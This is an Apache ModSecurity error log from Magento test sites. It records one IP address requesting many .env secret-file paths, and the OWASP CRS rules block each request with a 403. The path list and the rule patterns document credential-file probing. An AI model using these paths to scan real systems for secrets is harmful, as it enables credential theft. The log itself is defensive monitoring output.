[Mon Jan 26 21:24:15.705336 2026] [:error] [pid 1675794] [client 45.148.10.143:46718] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/api/.env"] [unique_id "aXfNbzsp5zRKVOBo1RPAQwAAAA0"]
[Mon Jan 26 21:24:15.728898 2026] [authz_core:error] [pid 1675794] [client 45.148.10.143:46718] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/.env
[Mon Jan 26 21:24:15.795341 2026] [authz_core:error] [pid 1664894] [client 45.148.10.143:46724] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.env
[Mon Jan 26 21:24:15.862461 2026] [:error] [pid 1670849] [client 45.148.10.143:46740] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aXfNb9W4MBlSxe-QA34legAAAAk"]
[Mon Jan 26 21:24:15.862659 2026] [:error] [pid 1670849] [client 45.148.10.143:46740] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aXfNb9W4MBlSxe-QA34legAAAAk"]
[Mon Jan 26 21:24:15.862814 2026] [:error] [pid 1670849] [client 45.148.10.143:46740] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env"] [unique_id "aXfNb9W4MBlSxe-QA34legAAAAk"]
[Mon Jan 26 21:24:15.928751 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aXfNb6rypnbEh-LOXYdW_QAAAAU"]
[Mon Jan 26 21:24:15.928957 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aXfNb6rypnbEh-LOXYdW_QAAAAU"]
[Mon Jan 26 21:24:15.929102 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.local"] [unique_id "aXfNb6rypnbEh-LOXYdW_QAAAAU"]
[Mon Jan 26 21:24:15.949602 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aXfNb6rypnbEh-LOXYdW_gAAAAU"]
[Mon Jan 26 21:24:15.949773 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aXfNb6rypnbEh-LOXYdW_gAAAAU"]
[Mon Jan 26 21:24:15.949905 2026] [:error] [pid 1675793] [client 45.148.10.143:46744] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.production"] [unique_id "aXfNb6rypnbEh-LOXYdW_gAAAAU"]
[Mon Jan 26 21:24:16.018856 2026] [:error] [pid 1675795] [client 45.148.10.143:46752] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /new/.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aXfNcMoFpPNqzjNngInAaQAAAA4"]
[Mon Jan 26 21:24:16.019076 2026] [:error] [pid 1675795] [client 45.148.10.143:46752] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aXfNcMoFpPNqzjNngInAaQAAAA4"]
[Mon Jan 26 21:24:16.019236 2026] [:error] [pid 1675795] [client 45.148.10.143:46752] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/new/.env.staging"] [unique_id "aXfNcMoFpPNqzjNngInAaQAAAA4"]
[Mon Jan 26 21:24:16.338766 2026] [:error] [pid 1675796] [client 45.148.10.143:46762] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /awstats/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aXfNcDR_nqoE8uOg2bsmXgAAABA"]
[Mon Jan 26 21:24:16.338988 2026] [:error] [pid 1675796] [client 45.148.10.143:46762] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aXfNcDR_nqoE8uOg2bsmXgAAABA"]
[Mon Jan 26 21:24:16.339161 2026] [:error] [pid 1675796] [client 45.148.10.143:46762] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/awstats/.env"] [unique_id "aXfNcDR_nqoE8uOg2bsmXgAAABA"]
[Mon Jan 26 21:24:16.556765 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /conf/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PAAAAAc"]
[Mon Jan 26 21:24:16.556982 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PAAAAAc"]
[Mon Jan 26 21:24:16.557151 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/conf/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PAAAAAc"]
[Mon Jan 26 21:24:16.594626 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PQAAAAc"]
[Mon Jan 26 21:24:16.594844 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PQAAAAc"]
[Mon Jan 26 21:24:16.595011 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/cron/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PQAAAAc"]
[Mon Jan 26 21:24:16.620114 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /www/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PgAAAAc"]
[Mon Jan 26 21:24:16.620313 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PgAAAAc"]
[Mon Jan 26 21:24:16.620494 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/www/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PgAAAAc"]
[Mon Jan 26 21:24:16.659084 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PwAAAAc"]
[Mon Jan 26 21:24:16.659277 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PwAAAAc"]
[Mon Jan 26 21:24:16.659438 2026] [:error] [pid 1662854] [client 45.148.10.143:46764] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/.env"] [unique_id "aXfNcJ9GheAZoWlmVDT0PwAAAAc"]
[Mon Jan 26 21:24:16.744568 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /docker/app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aXfNcJ940sjFbKiNzmHywwAAAAA"]
[Mon Jan 26 21:24:16.744834 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aXfNcJ940sjFbKiNzmHywwAAAAA"]
[Mon Jan 26 21:24:16.745007 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/docker/app/.env"] [unique_id "aXfNcJ940sjFbKiNzmHywwAAAAA"]
[Mon Jan 26 21:24:16.778215 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aXfNcJ940sjFbKiNzmHyxAAAAAA"]
[Mon Jan 26 21:24:16.778505 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aXfNcJ940sjFbKiNzmHyxAAAAAA"]
[Mon Jan 26 21:24:16.778649 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/env.backup"] [unique_id "aXfNcJ940sjFbKiNzmHyxAAAAAA"]
[Mon Jan 26 21:24:19.867197 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.vscode/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aXfNc5940sjFbKiNzmHyyQAAAAA"]
[Mon Jan 26 21:24:19.867448 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aXfNc5940sjFbKiNzmHyyQAAAAA"]
[Mon Jan 26 21:24:19.868022 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "autumnus.test.indacotrentino.com"] [uri "/.vscode/.env"] [unique_id "aXfNc5940sjFbKiNzmHyyQAAAAA"]
[Mon Jan 26 21:24:20.922092 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /js/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyygAAAAA"]
[Mon Jan 26 21:24:20.922363 2026] [:error] [pid 1677409] [client 45.148.10.143:46778] [client 45.148.10.143] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "autumnus.test.indacotrentino.com"] [uri "/js/.env"] [unique_id "aXfNdJ940sjFbKiNzmHyygAAAAA"]
